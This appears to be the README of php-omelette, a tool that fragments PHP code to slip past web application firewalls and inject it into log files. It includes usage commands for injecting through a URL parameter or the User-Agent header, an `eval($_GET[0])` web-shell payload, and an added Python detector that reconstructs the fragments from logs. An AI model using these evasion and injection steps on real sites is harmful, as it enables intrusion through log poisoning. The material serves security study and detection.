https://github.com/wireghoul/php-omelette

Code fragmentation technique for scripting languages

PHP OMELETTE
===============================================================================
A code fragmentation technique for avoiding filtering or detection by things
like web application firewalls. It is inspired by the concept of fragmented
shellcode used in memory corruption ([omelet][1]) and can scatter fragmented
PHP code through log files yet still have it execute as a single bit of PHP.

The broad concept is:
1. Everything inside the `<?php` `?>` tags is code
2. Everything inside `/*` `*/` multi-line comments is ignored
3. PHP parsing has some flexibility

The preferred use of this is to inject a small stager payload, but bigger files
could be transformed as well.

The steps are simple enough that they can be performed manually:
1. Add comment after all opening tags
2. Add comment before all closing tags
3. Add comments before and after semicolons
4. Add comment after comma
5. Add comments before and after opening and closing parentheses
6. Remove duplicate comments
7. Insert new line before each closing multi line comment
8. Remove empty lines

More steps can be added, or you can implement your own version, but keeping
them simple means you can use the steps on other languages like JavaScript as
well.
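
Seen from the defender's side, these steps mean that no single log line carries a recognisable statement, while every fragment line ends inside an open `/*` comment. The Python sketch below is an added example, not part of php-omelette: it walks log lines the way the PHP parser would, returning the code that remains once comments are removed and the line numbers that end inside a comment. The log format, the names `log_line` and `defragment`, and the sample entries are assumptions made for illustration.

```python
import re

OPEN_TAG = re.compile(r"<\?(?:php\b|=)?")

def log_line(user_agent):
    # Constructed combined-log-format entry; address and timestamp are made up.
    return ('203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] '
            f'"GET / HTTP/1.1" 200 512 "-" "{user_agent}"')

# Constructed sample: a harmless `echo(1);` fragmented by hand in the style of
# the steps above, one fragment per request, with ordinary traffic in between.
SAMPLE_LOG = [log_line(ua) for ua in (
    "Mozilla/5.0", "<?php /*", "*/echo/*", "Mozilla/5.0",
    "*/(1)/*", "*/;/*", "*/?>", "Mozilla/5.0")]

def defragment(lines):
    """Return (php_blocks, bridge_lines) for a list of log lines.

    php_blocks: code between PHP tags with /* */ comments removed.
    bridge_lines: 1-based numbers of lines that end inside such a comment.
    Heuristic only: string literals and // or # comments are not parsed.
    """
    text = "\n".join(lines)
    blocks, bridges, code = [], [], []
    state, line_no, i = "text", 1, 0
    while i < len(text):
        if text[i] == "\n":
            if state == "comment":
                bridges.append(line_no)
            line_no += 1
        if state == "text":
            tag = OPEN_TAG.match(text, i)
            if tag:
                state, i = "php", tag.end()
                continue
        elif state == "php":
            if text.startswith("/*", i):
                state, i = "comment", i + 2
                continue
            if text.startswith("?>", i):
                blocks.append(" ".join("".join(code).split()))
                state, i, code = "text", i + 2, []
                continue
            code.append(text[i])
        elif text.startswith("*/", i):  # state == "comment"
            state, i = "php", i + 2
            continue
        i += 1
    if state != "text" and code:  # no closing tag: PHP still runs the block
        blocks.append(" ".join("".join(code).split()))
    return blocks, bridges
```

A non-empty `bridge_lines` result is worth alerting on by itself, since ordinary log entries have no reason to leave a `/*` open after a PHP opening tag; the recovered blocks can then be passed to whatever per-line signatures are already in use.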

This repository includes some scripts to help automate the process of
fragmenting and injecting the code, and some "debugging" tools. The automated
process is not syntax aware so beware when using strings or embedding PHP in
things like HTML.

omelette
-------------------------------------------------------------------------------
The main script for fragmenting PHP code. It uses regex to generate the
fragmented PHP code. Code is given as the first argument. Examples:

```bash
$ ./omelette '=eval($_GET[0])?>'
$ ./omelette "$(cat t/shell3.php)" > plate
```

injectlog.sh and injectUA.sh
-------------------------------------------------------------------------------
Automatically fragment and inject the omelette to a website. Each script takes
PHP code as the first argument and a URL as the second, and sends the injection
as a parameter or via the User-Agent header. Examples:

```bash
$ ./injectlog.sh '' 'http://example.com?id=1&inject='
$ ./injectUA.sh "$(cat t/shell1.php)" http://example.com
```

view-clean.sh
-------------------------------------------------------------------------------
Tries to show the fragmented code in a cleaner/readable format. Example:

```bash
./view-clean.sh ./plate
```

php_parse.php
-------------------------------------------------------------------------------
Breaks PHP code into parsed tokens, handy for seeing how the PHP parser deals
with fragmented code:

```bash
php php_parse.php ./file
```

Credits
===============================================================================
Wireghoul - http://www.justanotherhacker.com

References:
[1]: "Eggs to omelet"